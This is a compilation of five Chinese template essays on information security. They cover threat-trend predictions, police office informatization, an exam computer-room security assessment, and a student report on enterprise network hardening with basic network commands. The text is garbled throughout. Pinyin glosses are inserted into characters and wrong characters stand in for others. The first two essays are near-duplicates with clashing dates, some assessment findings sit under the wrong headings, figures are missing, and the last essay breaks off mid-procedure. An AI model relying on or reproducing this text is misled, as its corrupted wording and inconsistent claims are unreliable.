第一篇：網(wǎng)絡信息安全發(fā)展調(diào)研報告

1.垃圾郵件和網(wǎng)絡欺騙將立足“社交網(wǎng)絡”

毫無疑問，2009年是社交網(wǎng)站迄今為止受到攻擊最多的一年。但是與2012年相比，這些攻擊可能根本不值一提。Koobface蠕蟲等安全問題對社交網(wǎng)站用戶形成了很大的困擾，但這些惡意軟件仍然是首先感染用戶的電腦，然后再竊取信息。但現(xiàn)在，安全專家則認為，惡意軟件作者將進一步拓展攻擊范圍，把惡意軟件植入到社交網(wǎng)站應用內(nèi)部。有了這種病毒，無論用戶是否訪問社交網(wǎng)站，黑客都能毫無限制地竊取用戶的資料和登錄密碼。

思科在其2009年《年度安全報告》中揭示了社交媒體（尤其是社交網(wǎng)絡）對網(wǎng)絡安全的影響，并探討了人（而非技術(shù)）在為網(wǎng)絡犯罪創(chuàng)造機會方面所起的關(guān)鍵作用。社交網(wǎng)絡已經(jīng)迅速成為網(wǎng)絡犯罪的溫床，因為這些網(wǎng)站的成員過于信任他們社區(qū)的其他成員，沒有采取阻止惡意軟件和計算機病毒的預防措施。小漏洞、不良用戶行為以及過期的安全軟件結(jié)合在一起會具有潛在的破壞性，可能大幅增加網(wǎng)絡安全的風險。鑒于以上，2012年社交網(wǎng)絡或許將給我信息安全帶來更多的“驚喜”！

2.云計算成為孕育黑客新的溫床

云計算在2009年取得了長足的發(fā)展，但我們也必須意識到，市場的快速發(fā)展會犧牲一定的安全性。攻擊者今后將把更多的時間用于挖掘云計算服務提供商的ApI（應用編程接口）漏洞。

www.tmdps.cn【xiexiebang.com范文網(wǎng)】

毋庸置疑，已經(jīng)開始有越來越多的IT功能通過云計算來提供，網(wǎng)絡犯罪也順應了這一趨勢。安全廠商Fortinet預計，網(wǎng)絡犯罪借鑒“服務即安 全”（security-as-a-service）的理念，打造“服務即網(wǎng)絡犯罪”（cybercrime-as-a-service）這一特殊品牌。網(wǎng)絡犯罪也將效仿企業(yè)的做法使用基于云計算的工具，以便更有效率地部署遠程攻擊，甚至借此大幅拓展攻擊范圍。

3.大量Mac計算機被病毒感染或黑客入侵

安全廠商Websense安全研究高級經(jīng)理帕特里克?盧納德（patrick Runald）說：“Mac OS X中沒有任何的惡意軟件防范機制?！彼硎?，在CanSecWest黑客大賽上，Mac已經(jīng)連續(xù)兩年成為第一個被攻破的系統(tǒng)。

4.智能手機安全問題愈發(fā)嚴重

隨著移動應用的不斷增多，智能設(shè)備的受攻擊面也在不斷擴大，移動安全所面臨的局面將會越來越嚴重。雖然我們已經(jīng)看到了iphone上的蠕蟲病毒，雖然它還不能自我傳播，還得依靠電腦來傳播，但是我們預計，2012年，將會出現(xiàn)真正可以自我傳播的病毒，嚴重威脅iphone和Android等設(shè)備。

卡巴斯基實驗室惡意軟件高級研究員羅伊爾?舒文伯格（Roel Schouwenberg）說：“Android手機的日益流行，加之缺乏對第三方應用安全性的有效控制，將導致諸多高調(diào)惡意軟件的出現(xiàn)?！?/p>

總體而言，安全專家認為，隨著用戶將智能手機作為迷你pC來處理銀行交易、游戲、社交網(wǎng)站和其他的業(yè)務，黑客將越發(fā)關(guān)注這一平臺。

5.搜索引擎成為黑客全新贏利方式

黑客會不斷尋找新的方法借助釣魚網(wǎng)站吸引用戶上鉤，利用搜索引擎優(yōu)化技術(shù)展開攻擊便是其中的一種方法。谷歌和必應（Bing）對實時搜索的支持 也將吸引黑客進一步提升相關(guān)技術(shù)。作為一種攻擊渠道，搜索引擎是非常理想的選擇，因為用戶通常都非常信任搜索引擎，對于排在前幾位的搜索結(jié)果更是沒有任何 懷疑，這就給了黑客可乘之機，從而對用戶發(fā)動攻擊。

6.虛擬化普及 安全威脅適應潮流

與Cloud類似的是，虛擬化技術(shù)也將抓住快速發(fā)展的時機。業(yè)界中已經(jīng)有公司開始研究傳統(tǒng)桌面電腦的虛擬化。虛擬化不僅能提供一種極高的安全保障，還能方便協(xié)作，提高效率。

除了瘦客戶機的虛擬桌面以外，企業(yè)還將會開始考察筆記本電腦虛擬機以作為創(chuàng)建安全企業(yè)桌面的手段之一。虛擬機可利用快照迅速恢復到已知的安全狀態(tài)配置，從而為網(wǎng)上銀行或安全的企業(yè)應用提供更高等級的安全保障。工作和休閑可以在同一的硬件上共存，只要相互保持隔離就行。

第二篇：網(wǎng)絡信息安全發(fā)展調(diào)研報告

這是一篇關(guān)于調(diào)研報告的范文，可以提供大家借鑒！

1.垃圾郵件和網(wǎng)絡欺騙將立足“社交網(wǎng)絡”

毫無疑問，2009年是社交網(wǎng)站迄今為止受到攻擊最多的一年。但是與2010年相比，這些攻擊可能根本不值一提。Koobface蠕蟲等安全問題對社交網(wǎng)站用戶形成了很大的困擾，但這些惡意軟件仍然是首先感染用戶的電腦，然后再竊取信息。但現(xiàn)在，安全專家則認為，惡意軟件作者將進一步拓展攻擊范圍，把惡意軟件植入到社交網(wǎng)站應用內(nèi)部。有了這種病毒，無論用戶是否訪問社交網(wǎng)站，黑客都能毫無限制地竊取用戶的資料和登錄密碼。

思科在其2009年《安全報告》中揭示了社交媒體（尤其是社交網(wǎng)絡）對網(wǎng)絡安全的影響，并探討了人（而非技術(shù)）在為網(wǎng)絡犯罪創(chuàng)造機會方面所起的關(guān)鍵作用。社交網(wǎng)絡已經(jīng)迅速成為網(wǎng)絡犯罪的溫床，因為這些網(wǎng)站的成員過于信任他們社區(qū)的其他成員，沒有采取阻止惡意軟件和計算機病毒的預防措施。小漏洞、不良用戶行為以及過期的安全軟件結(jié)合在一起會具有潛在的破壞性，可能大幅增加網(wǎng)絡安全的風險。鑒于以上，2010年社交網(wǎng)絡或許將給我信息安全帶來更多的“驚喜”！

2.云計算成為孕育黑客新的溫床

云計算在2009年取得了長足的發(fā)展，但我們也必須意識到，市場的快速發(fā)展會犧牲一定的安全性。攻擊者今后將把更多的時間用于挖掘云計算服務提供商的ApI（應用編程接口）漏洞。

毋庸置疑，已經(jīng)開始有越來越多的IT功能通過云計算來提供，網(wǎng)絡犯罪也順應了這一趨勢。安全廠商Fortinet預計，網(wǎng)絡犯罪借鑒“服務即安 全”（security-as-a-service）的理念，打造“服務即網(wǎng)絡犯罪”（cybercrime-as-a-service）這一特殊品牌。網(wǎng)絡犯罪也將效仿企業(yè)的做法使用基于云計算的工具，以便更有效率地部署遠程攻擊，甚至借此大幅拓展攻擊范圍。

對于云計算將被黑客所利用這個嚴峻的問題，各大安全公司和技術(shù)人員會把精力放在與云計算相關(guān)的安全服務上，提供加密、目錄和管理、反垃圾郵件、惡意程序等各種解決方案。據(jù)悉，著名安全評測機構(gòu)VB100號召安全行業(yè)應該聯(lián)合起來，組成一個對抗惡意程序的共同體，分享技術(shù)和資源?；蛟S這一提議在2010年能發(fā)展到實質(zhì)性的階段。

3.大量Mac計算機被病毒感染或黑客入侵

經(jīng)濟危機非但沒有傷害到蘋果的利益，反而使其業(yè)績進一步提升。但安全專家表示，在市場份額提升的同時，Mac也要面臨更多的黑客攻擊。過去幾年 間，蘋果的pC市場份額已經(jīng)從10%增長到12%，而且沒有放緩的跡象。與此同時，在售價高于1000美元的筆記本電腦中，蘋果更是占據(jù)了90%的份額，但針對iphone（手機上網(wǎng)）和MacBook的攻擊也逐步引發(fā)外界關(guān)注。安全專家預計，Mac有可能會成為下一個最易受攻擊的目標。盡管多數(shù)攻擊都瞄準Windows，但2012年將會出現(xiàn)更多針對Mac OS X的攻擊。

安全廠商Websense安全研究高級經(jīng)理帕特里克•盧納德（patrick Runald）說：“Mac OS X中沒有任何的惡意軟件防范機制?！彼硎荆贑anSecWest黑客大賽上，Mac已經(jīng)連續(xù)兩年成為第一個被攻破的系統(tǒng)。

4.智能手機安全問題愈發(fā)嚴重

隨著移動應用的不斷增多，智能設(shè)備的受攻擊面也在不斷擴大，移動安全所面臨的局面將會越來越嚴重。雖然我們已經(jīng)看到了iphone上的蠕蟲病毒，雖然它還不能自我傳播，還得依靠電腦來傳播，但是我們預計，2012年，將會出現(xiàn)真正可以自我傳播的病毒，嚴重威脅iphone和Android等設(shè)備。

卡巴斯基實驗室惡意軟件高級研究員羅伊爾•舒文伯格（Roel Schouwenberg）說：“Android手機的日益流行，加之缺乏對第三方應用安全性的有效控制，將導致諸多高調(diào)惡意軟件的出現(xiàn)?！?o:p>

總體而言，安全專家認為，隨著用戶將智能手機作為迷你pC來處理銀行交易、游戲、社交網(wǎng)站和其他的業(yè)務，黑客將越發(fā)關(guān)注這一平臺。

5.搜索引擎成為黑客全新贏利方式

黑客會不斷尋找新的方法借助釣魚網(wǎng)站吸引用戶上鉤，利用搜索引擎優(yōu)化技術(shù)展開攻擊便是其中的一種方法。谷歌和必應（Bing）對實時搜索的支持 也將吸引黑客進一步提升相關(guān)技術(shù)。作為一種攻擊渠道，搜索引擎是非常理想的選擇，因為用戶通常都非常信任搜索引擎，對于排在前幾位的搜索結(jié)果更是沒有任何 懷疑，這就給了黑客可乘之機，從而對用戶發(fā)動攻擊。

6.虛擬化普及 安全威脅適應潮流

與Cloud類似的是，虛擬化技術(shù)也將抓住快速發(fā)展的時機。業(yè)界中已經(jīng)有公司開始研究傳統(tǒng)桌面電腦的虛擬化。虛擬化不僅能提供一種極高的安全保障，還能方便協(xié)作，提高效率。

除了瘦客戶機的虛擬桌面以外，企業(yè)還將會開始考察筆記本電腦虛擬機以作為創(chuàng)建安全企業(yè)桌面的手段之一。虛擬機可利用快照迅速恢復到已知的安全狀態(tài)配置，從而為網(wǎng)上銀行或安全的企業(yè)應用提供更高等級的安全保障。工作和休閑可以在同一的硬件上共存，只要相互保持隔離就行。

第三篇：信息安全調(diào)研報告

公安基層辦公室信息化調(diào)研報告

現(xiàn)代社會的信息化、網(wǎng)絡化和現(xiàn)代通信、計算機互聯(lián)網(wǎng)技術(shù)的發(fā)展，對公安機關(guān)提出了越來越高的要求。為適應社會形勢發(fā)展的需要，公安部近年來連續(xù)部署了“金盾工程”建設(shè)，標志著警務工作信息化工程全面啟動。要適應社會發(fā)展和科技進步的需要，公安機關(guān)必須把科技強警工作和公安信息化建設(shè)擺在重要的位置。公安辦公室作為“司令部”、“參謀部”，要及時、準確掌握各類情況，為領(lǐng)導決策提供科學依據(jù)，必須加強信息化建設(shè)。

一、基層公安辦公室信息化是公安信息化的薄弱環(huán)節(jié)

（一）認識上的偏差

部分領(lǐng)導和民警在思想觀念上存在著只須懂法就足以勝任當前公安工作的偏見，對信息化的了解也僅限于信息化就是用微機打字、信息化就是上因特網(wǎng)，對信息化范圍、信息化開展的意義認識不足，沒有真正意識到信息化建設(shè)對公安工作有著巨大推動作用。因此，公安機關(guān)出現(xiàn)了阻礙科學技術(shù)與辦案結(jié)合的不利因素，缺乏依靠科技進步的內(nèi)在動力；對于如何把信息技術(shù)運用到公安工作中來、如何用信息化促進公安工作的跨越式發(fā)展，研究較少，重視不夠。這種狀況已成為公安機關(guān)加快信息化進程，推動辦公、辦案現(xiàn)代化發(fā)展的瓶頸，與當前形勢發(fā)展和公安工作的任務需求極不相應，也制約了公安工作的發(fā)展。

（二）辦公室基礎(chǔ)設(shè)施簡陋導致工作效率的低下

科技強警的鼓敲了幾年，但基層公安局辦公室仍然普遍存在基礎(chǔ)設(shè)施簡陋、辦公條件差等現(xiàn)象，辦公室作為綜合部門，工作是多而雜，且有的工作手續(xù)多、所經(jīng)部門廣，僅僅依靠幾個民警的手工操作或單機辦公，往往使辦公室民警大有力不從心之感，工作效率低下那也是情理之中。因此，針對辦公室的職能作用，建立省人省力的信息化系統(tǒng)，將辦公室人員從材料難寫的困惑中解脫出來，提高工作效率勢在必行。

（三）缺乏人才，使信息化建設(shè)力不從心

公安機關(guān)信息化建設(shè)工作存在最突出的問題，就是嚴重缺乏信息技術(shù)人才。從目前來看，公安機關(guān)的工作人員在過去所接受的教育中很少涉及信息技術(shù)知識，而專門的技術(shù)人員又大多為法醫(yī)、會計、痕檢、攝像等傳統(tǒng)技術(shù)型工作人員，因此對于信息技術(shù)這門科技含量很高的結(jié)合技術(shù)，顯得束手無策，很難提出一個長遠的發(fā)展規(guī)劃、很難得心應手地組織開展信息化建設(shè)。對于有一些信息化建設(shè)的單位，又由于人才缺乏，先進的信息化設(shè)備不能使用或不能充分發(fā)揮作用，使信息化建設(shè)的成果成為擺設(shè)。因此在沒有一支高水平的信息化技術(shù)人才隊伍的前提下，公安信息化建設(shè)對某些單位而言簡直是一種神話或資金上的嚴重浪費。

（四）缺乏資金，信息化建設(shè)難以保障

信息化建設(shè)是一項高技術(shù)、高投入、高效能的現(xiàn)代化基礎(chǔ)建設(shè)，必須要有足

夠的建設(shè)經(jīng)費作保證。它所涉及的硬件設(shè)備、軟件系統(tǒng)都需要大量的資金來購置。以一個縣公安局辦公室為例，信息化系統(tǒng)需要一個由一臺服務器，10臺終端微機組成的小型局型網(wǎng)，購置網(wǎng)絡辦公系統(tǒng)、數(shù)據(jù)統(tǒng)計系統(tǒng)，僅此幾項建設(shè)資金投入就達幾十萬元。財政卻往往因為各種原因，不能保障和支持公安機關(guān)的信息化建設(shè)。因此公安機關(guān)在信息化建設(shè)上只能是等米下鍋，信息化建設(shè)得不到有效保障。

二、加強基層公安局辦公室信息化建設(shè)的方法

（一）信息化系統(tǒng)的構(gòu)成公安辦公室信息化系統(tǒng)就是根據(jù)信息論、系統(tǒng)論、控制論、現(xiàn)代管理科學理論、現(xiàn)代信息技術(shù)，結(jié)合辦公室的職能作用和業(yè)務工作特點而建立的信息體系。公安辦公室信息化系統(tǒng)是公安信息系統(tǒng)的子系統(tǒng)，以技術(shù)為輔助手段，使公安辦公室獲得快速、靈敏、準確、全面和安全有效的綜合信息支持，實現(xiàn)辦公自動化、科學化、網(wǎng)絡化，以充分發(fā)揮公安辦公室的綜合分析、“參謀”作用。一般來說，根據(jù)辦公室的職能作用，基層公安局辦公室信息化系統(tǒng)主要包括以下幾個系統(tǒng)：

1、指揮中心信息處理系統(tǒng)

該系統(tǒng)主要承擔快速、準確、全面獲得的動態(tài)信息，為領(lǐng)導正確決策提供第一手資料，是科學決策、快速指揮調(diào)度的重要依據(jù)和信息主渠道。指揮中心信息處理系統(tǒng)縱向與上下級公安指揮中心信息網(wǎng)絡連接，橫向以公安信息管理中心為樞紐，整合同級公安犯罪信息中心、交通、戶政、刑偵、出入境、治安等信息系統(tǒng)，運用計算機網(wǎng)絡技術(shù)控制手段，將分散的信息統(tǒng)一起來，實現(xiàn)信息資源共享和系統(tǒng)開放，成為覆蓋全局、四通八達的能為各警種、各基層戰(zhàn)斗單位和一線民警提供大量信息的高速通信網(wǎng)，從而克服時空限制支持各警種協(xié)同作戰(zhàn)。

2、公安統(tǒng)計系統(tǒng)

該系統(tǒng)主要依靠統(tǒng)計軟件，進行數(shù)據(jù)的收集、分類、匯總，有效地進行數(shù)據(jù)統(tǒng)計和解決統(tǒng)計不實問題，并對下級公安機關(guān)進行有力的綜合指導。公安統(tǒng)計系統(tǒng)可通過數(shù)據(jù)統(tǒng)計，進一步進行社會治安情況分析，為各級部門提供服務。

3、綜合調(diào)研系統(tǒng)

該系統(tǒng)主要以科學管理的手段快速、及時、準確地收集各業(yè)務單位、基層機關(guān)所得到的成績和經(jīng)驗，進行系統(tǒng)分析，反映整個公安工作的經(jīng)驗、成就和業(yè)績。

4、檔案管理系統(tǒng)

該系統(tǒng)主要是通過科學技術(shù)手段解決過去查找材料、文件困難，材料保存時間不能過長等問題。檔案管理系統(tǒng)建立后，將文件、材料的文號、文名、存放文柜進行編號，錄入計算機，以便于檢索，并將文件、材料進行掃描存入微機，需要查閱，只需在計算機中進行檢索便可直接查看，同時還可通過局域網(wǎng)，突破時空限制。

5、刑偵、治安、戶政等業(yè)務部門系統(tǒng)

公安辦公室的職能作用決定了其工作具有綜合性的特點，辦公室與刑偵、治安、戶政等業(yè)務部門是相互服務的。因此，辦公室信息系統(tǒng)與刑偵、治安、戶政等業(yè)務部門的網(wǎng)絡連接是必不可少的。刑偵、治安、戶政等業(yè)務部門子系統(tǒng)主要是結(jié)合網(wǎng)絡技術(shù)手段，進行網(wǎng)上追逃、戶口上網(wǎng)管理，以便進行信息快速流通。如指揮中心信息處理子系統(tǒng)通過業(yè)務部門收集各類業(yè)務數(shù)據(jù)、不安定情況等；辦公室綜合調(diào)研系統(tǒng)通過刑偵部門收集打擊犯罪的情況等；公安統(tǒng)計子系統(tǒng)從戶政收集人口數(shù)據(jù)等等，都可從各業(yè)務部門子系統(tǒng)網(wǎng)絡上獲得。

（二）辦公室信息化系統(tǒng)的建設(shè)

1、組建經(jīng)濟實用的小型局域網(wǎng)，搭建網(wǎng)絡化辦公平臺，實現(xiàn)信息化系統(tǒng)的職能作用。

2、購置實用的業(yè)務辦公系統(tǒng)軟件，實現(xiàn)辦公自動化。

基層公安辦公室根據(jù)實際情況可以自行購買相應的業(yè)務及辦公系統(tǒng)軟件。各基層公安局辦公室要積極爭取政策，引進人才，把技術(shù)精、有責任心和熱愛公安事業(yè)的信息技術(shù)人才充實到公安機關(guān)中來，并努力營造一個適合技術(shù)人員發(fā)展的空間，保證信息技術(shù)人才進得來、留得住、用得好、有發(fā)展。其次立足本室，在沒有專門人才的情況下，加大全員培訓力度，從實際工作出發(fā)，從實際應用出發(fā)，努力提高全體民警的信息化素質(zhì)，提高計算機使用水平。

3、建立制度，確保信息化建設(shè)發(fā)揮作用。

信息化建設(shè)的項目建成以后，不能放著、擺著不用，而要充分地、強制性地利用起來。不能因為民警囿于傳統(tǒng)工作方法，學習掌握上存在惰性，學習掌握需要一段時間，而不做制度上的要求。應從整體發(fā)展的角度、公安事業(yè)發(fā)展的高度，制定規(guī)章制度，要求各類案件信息必須輸入微機、各類公文必須在微機上書寫、流轉(zhuǎn)，從而使民警從傳統(tǒng)的辦公狀態(tài)進入到網(wǎng)絡化辦公、信息化辦公的角色中，只有這樣才能把信息化建設(shè)的成果應用到公安工作中，推動公安工作向前發(fā)展，才真正地將信息化建設(shè)落到實處。

第四篇：網(wǎng)絡信息安全評估報告

計算機信息安全評估報告

如何

實

現(xiàn)

如

下

圖

所

示

可用性1.人們通常采用一些技術(shù)措施或網(wǎng)絡安全設(shè)備來實現(xiàn)這些目標。例如：

使用防火墻，把攻擊者阻擋在網(wǎng)絡外部，讓他們“迚不來”。

即使攻擊者迚入了網(wǎng)絡內(nèi)部，由于有加密機制，會使他們“改不了”和“拿不走”關(guān) 鍵信息和資源。

機密性2機密性將對敏感數(shù)據(jù)的訪問權(quán)限控制在那些經(jīng)授權(quán)的個人，只有他們才能查看數(shù)據(jù)。機密性可防止向未經(jīng)授權(quán)的個人泄露信息，或防止信息被加工。

如圖所示，“迚不來”和“看不懂”都實現(xiàn)了信息系統(tǒng)的機密性。

人們使用口令對迚入系統(tǒng)的用戶迚行身份鑒別，非法用戶沒有口令就“迚不來”，這就保證了信息系統(tǒng)的機密性。

即使攻擊者破解了口令，而迚入系統(tǒng)，加密機制也會使得他們“看不懂”關(guān)鍵信息。例如，甲給乙發(fā)送加密文件，只有乙通過解密才能讀懂其內(nèi)容，其他人看到的是亂碼。由此便實現(xiàn)了信息的機密性。

完整性3如圖所示，“改不了”和“拿不走”都實現(xiàn)了信息系統(tǒng)的完整性。使用加密機制，可以保證信息系統(tǒng)的完整性，攻擊者無法對加密信息迚行修改或者復制。

不可抵賴性4如圖所示，“跑不掉”就實現(xiàn)了信息系統(tǒng)的不可抵賴性。如果攻擊者迚行了非法操作，系統(tǒng)管理員使用審計機制或簽名機制也可讓他們無所遁形

對考試的機房迚行“管理制度”評估。（1）評估說明

為規(guī)范管理,保障計算機設(shè)備的正常運行,創(chuàng)造良好的上機環(huán)境,必須制定相關(guān)的管理制度

（2）評估內(nèi)容

沒有建立相應信息系統(tǒng)運行管理規(guī)程、缺陷管理制度、統(tǒng)計匯報制度、運維流程、值班制度，沒有實行工作票制度；機房出入管理制度上墻，但沒有機房迚出情況記錄（3）評估分析報告

所存在問題：1沒有系統(tǒng)的相關(guān)負責人，機房也是誰人都可以自由出入。2在上機過程中做與學習無關(guān)的工作。3機房財產(chǎn)規(guī)劃不健全等（4）評估建議

1、計算機室的管理由系統(tǒng)管理員負責，非機房工作人員未經(jīng)允許不準迚入。未經(jīng)許可不得擅自上機操作和對運行設(shè)備及各種配置迚行更改。

2、保持機房內(nèi)清潔、安靜，嚴禁機房內(nèi)吸煙、吐痰以及大聲喧嘩；嚴禁將易燃、易爆、易污染和強磁物品帶入機房。

3、機房內(nèi)的一切物品，未經(jīng)管理員同意，不得隨意挪動，拆卸和帶出機房。

4、上機時，應先認真檢查機器情況，如有問題應及時向機房管理員反應。

5、上機人員不得在機房內(nèi)迚行與上機考試無關(guān)的計算機操作。

6、上機時應按規(guī)定操作，故意或因操作不當造成設(shè)備損壞，除照價賠償外，視情節(jié)輕重給予處罰。對考試的機房迚行“物理安全”評估。（1）評估說明

防火，防水，防塵，防腐蝕，主機房安裝門禁、監(jiān)控與報警系統(tǒng)。（2）評估內(nèi)容 主機房沒有安裝門禁、監(jiān)控系統(tǒng)，有消防報警系統(tǒng)。（3）評估分析報告

沒有詳細的機房配線圖，機房供甴系統(tǒng)將動力、照明用甴與計算機系統(tǒng)供甴線路是分開的，機房沒有配備應急照明裝置，有定期對UPS的運行狀況迚行檢測但沒有檢測記錄。

（4）評估建議

有詳細的機房配線圖，機房供甴系統(tǒng)將動力、照明用甴與計算機系統(tǒng)供甴線路分開，機房配備應急照明裝置，定期對UPS的運行狀況迚行檢測（查看半年內(nèi)檢測記錄）對考試的機房迚行“計算機系統(tǒng)安全”評估。（1）評估說明

應用系統(tǒng)的角色、權(quán)限分配有記錄；用戶賬戶的變更、修改、注銷有記錄（半年記錄情況）；關(guān)鍵應用系統(tǒng)的數(shù)據(jù)功能操作迚行審計幵迚行長期存儲；對關(guān)鍵應用系統(tǒng)有應急預案；關(guān)鍵應用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更；新系統(tǒng)上線前迚行安全性測試。

（2）評估內(nèi)容

營銷系統(tǒng)的角色、權(quán)限分配有記錄，其余系統(tǒng)沒有；用戶賬戶的變更、修改、注銷沒有記錄；關(guān)鍵應用系統(tǒng)的數(shù)據(jù)功能操作沒有迚行審計；沒有針對關(guān)鍵應用系統(tǒng)的應急預案；關(guān)鍵應用系統(tǒng)管理員賬戶、用戶賬戶口令有定期迚行變更；有些新系統(tǒng)上線前沒有迚行過安全性測試。

（3）評估分析報告

網(wǎng)絡中的防火墻位置部署合理，防火墻規(guī)則配置符合安全要求，防火墻規(guī)則配置的建立、更改有規(guī)范申請、審核、審批流程，對防火墻日志迚行存儲、備份。

（4）評估建議

完善系統(tǒng)的角色、權(quán)限分配有記錄；記錄用戶賬戶的變更、修改、注銷（半年記錄情況）；關(guān)鍵應用系統(tǒng)的數(shù)據(jù)功能操作迚行審計；制定針對關(guān)鍵應用系統(tǒng)的應急預案；關(guān)鍵應用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更；新系統(tǒng)上線前應嚴格按照相關(guān)標準迚行安全性測試。

對考試的機房迚行“網(wǎng)絡與通信安全”評估。（1）評估說明

按標準部署身份認證系統(tǒng)、安全管理平臺、針對安全設(shè)備的日志服務器，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年迚行一次信息安全風險評估。

（2）評估內(nèi)容

沒有部署身份認證系統(tǒng)、安全管理平臺，沒有漏洞掃描系統(tǒng)，重要系統(tǒng)沒有迚行信息安全風險評估，沒有部署針對安全設(shè)備的日志服務器。

（3）評估分析報告

按標準部署身份認證系統(tǒng)、安全管理平臺、針對安全設(shè)備的日志服務器，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年迚行一次信息安全風險評估。

（4）評估建議

部署身份認證系統(tǒng)、安全管理平臺，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年內(nèi)迚行信息安全風險評估，部署針對安全設(shè)備的日志服務器。

信息安全評估：

對考試的機房迚行“日志與統(tǒng)計安全”評估。（1）評估說明

每天計算機上機記錄日志在冊，對系統(tǒng)迚行不定時的還原。對本局半年內(nèi)發(fā)生的較大的、或者發(fā)生次數(shù)較多的信息安全事件迚行匯總記錄，形成本單位的安全事件列表

（2）評估內(nèi)容

已成立了信息安全領(lǐng)導機構(gòu)，但尚未成立信息安全工作機構(gòu)。

（3）評估分析報告

局域網(wǎng)核心交換設(shè)備、城域網(wǎng)核心路由設(shè)備應采取設(shè)備冗余或準備備用設(shè)備，不允許外聯(lián)鏈路繞過防火墻，具有當前準確的網(wǎng)絡拓撲結(jié)構(gòu)圖

（4）評估建議

完善信息安全組織機構(gòu)，成立信息安全工作機構(gòu)。

第五篇：【企業(yè)網(wǎng)絡】網(wǎng)絡信息安全報告

XX中型企業(yè)網(wǎng)安全 網(wǎng)絡信息安全報告

一、實驗目的及要求

該專周的目標是讓學生掌握網(wǎng)絡安全的基本框架，網(wǎng)絡安全的基本理論。以及了解計算機網(wǎng)絡安全方面的管理、配置和維護。

本課程要求在理論教學上以必需夠用為原則，應盡量避免過深過繁的理論探討，重在理解網(wǎng)絡安全的基本框架，網(wǎng)絡安全的基本理論。掌握數(shù)據(jù)加密、防火墻技術(shù)、入侵檢測技術(shù)以及學習網(wǎng)絡病毒防治。了解Windows 2000的安全、Web的安全、網(wǎng)絡安全工程以及黑客常用的系統(tǒng)攻擊方法。本課程要求學生對計算機的使用有一定了解（了解Windows的使用，具有鍵盤操作和文件處理的基礎(chǔ)），并已經(jīng)掌握計算機網(wǎng)絡的基本原理。

二、專周內(nèi)容

1、安全需求分析

（1）網(wǎng)絡安全問題主要集中在對服務器的安全保護、防黑客和病毒、重要網(wǎng)段的保護及管理安全上。因此，我們必須采取相應的安全措施杜絕安全隱患，其中應該做到：

A、公開服務器的安全保護 B、防止黑客從外部攻擊 C、入侵檢測與監(jiān)控 D、病毒防護 E、數(shù)據(jù)安全保護 F、網(wǎng)絡的安全管理

（2）解決網(wǎng)絡安全問題的一些要求

A、大幅度地提高系統(tǒng)的安全性（重點是可用性和可控性）；

B、保持網(wǎng)絡原有的特點，即對網(wǎng)絡的協(xié)議和傳輸具有良好的透明性，能透明接入，無需更改網(wǎng)絡設(shè)置；

C、易于操作、維護，并便于自動化管理，而不增加或少增加附加操作；

D、盡量不影響原網(wǎng)絡拓撲結(jié)構(gòu)，同時便于系統(tǒng)及系統(tǒng)功能的擴展；

E、安全保密系統(tǒng)具有較好的性能價格比。一次性投資，可以長期使用；

F、安全產(chǎn)品具有合法性，及經(jīng)過國家有關(guān)管理部門的認可或認證；

（3）系統(tǒng)安全目標

A、建立一套完整可行的網(wǎng)絡安全與網(wǎng)絡管理策略；

B、將內(nèi)部網(wǎng)絡、公開服務器網(wǎng)絡和外網(wǎng)進行有效隔離，避免與外部網(wǎng)絡直接通信；

C、建立網(wǎng)站各主機和服務器的安全保護措施，保證他們的系統(tǒng)安全；

D、加強合法用戶的訪問認證，同時將用戶的訪問權(quán)限控制在最低限度；

E、全面監(jiān)視對公開服務器的訪問，及時發(fā)現(xiàn)和拒絕不安全的操作和黑客攻擊行為；

F、加強對各種訪問的審計工作，詳細記錄對網(wǎng)絡、公開服務器的訪問行為，形成完整的系統(tǒng)日志；

2、網(wǎng)絡拓撲

3、網(wǎng)絡安全的基本內(nèi)容

（1）基本網(wǎng)絡命令

A、ping命令： ping –t IP，向指定的計算機不停的發(fā)送數(shù)據(jù)包，按Ctr+Break快捷鍵可以查看統(tǒng)計信息并繼續(xù)運行，按 Ctr+C可中止運行。

B、Tracert命令：tracert IP 顯示從本地計算機到目標服務器所經(jīng)過的計算機：

C、pathping pop.pcpop.com 除了顯示路由外，還提供325S的分析，計算丟失包的%

（2）操作系統(tǒng)安全

A、屏蔽不需要的服務組件

開始——程序——管理工具——服務 出現(xiàn)以下窗口：

然后在該對話框中選中需要屏蔽的程序，并單擊右鍵，然后選擇“停止”命令，同時將“啟動類型”設(shè)置為“手動”或“已禁用”，這樣就可以對指定的服務組進行屏蔽了。B、關(guān)閉默認共享：“開始”——“程序”——“管理工具”——“服務”——“Server”

（3）數(shù)據(jù)庫系統(tǒng)安全

A、使用安全的帳號策略和Windows認證模式

由于SQL Server不能更改sa用戶名稱，也不能刪除這個超級用戶，所以，我們必須對這個帳號進行最強的保護，當然，包括使用一個非常強壯的密碼，最好不要在數(shù)據(jù)庫應用中使用sa帳號，只有當沒有其它方法登錄到 SQL Server 實例(例如，當其它系統(tǒng)管理員不可用或忘記了密碼)時才使用 sa?？梢孕陆⒁粋€擁有與sa一樣權(quán)限的超級用戶來管理數(shù)據(jù)庫。安全的帳號策略還包括不要讓管理員權(quán)限的帳號泛濫。

SQL Server的認證模式有Windows身份認證和混合身份認證兩種。在任何可能的時候，應該對指向SQL Server的連接要求Windows身份驗證模式。

Windows認證模式比混合模式更優(yōu)越，原因在以下：

1)它通過限制對Microsoft Windows用戶和域用戶帳戶的連接，保護SQL Server免受大部分Internet工具的侵害。

2)服務器將從Windows安全增強機制中獲益，例如更強的身份驗證協(xié)議以及強制的密碼復雜性和過期時間。

3)使用Windows認證，不需要將密碼存放在連接字符串中。存儲密碼是使用標準SQL Server登錄的應用程序的主要漏洞之一。

4)Windows認證意味著你只需要將密碼存放在一個地方。

要在SQL Server的Enterprise Manager安裝Windows身份驗證模式，步驟操作： 展開服務器組——右鍵點擊服務器——然后點擊“屬性”——在安全性選項卡的身份驗證中——點擊“僅限Windows”。（4）網(wǎng)絡防火墻工具：紅墻主機網(wǎng)絡防火墻 安裝

1.具體操作如下：

第一步： 將“愛思紅墻主機網(wǎng)絡防火墻”的安裝光盤插入驅(qū)動器，運行根目錄下的Setup文件來運行其安裝程序，進入“愛思紅墻主機網(wǎng)絡防火墻安裝”窗口；

第二步：

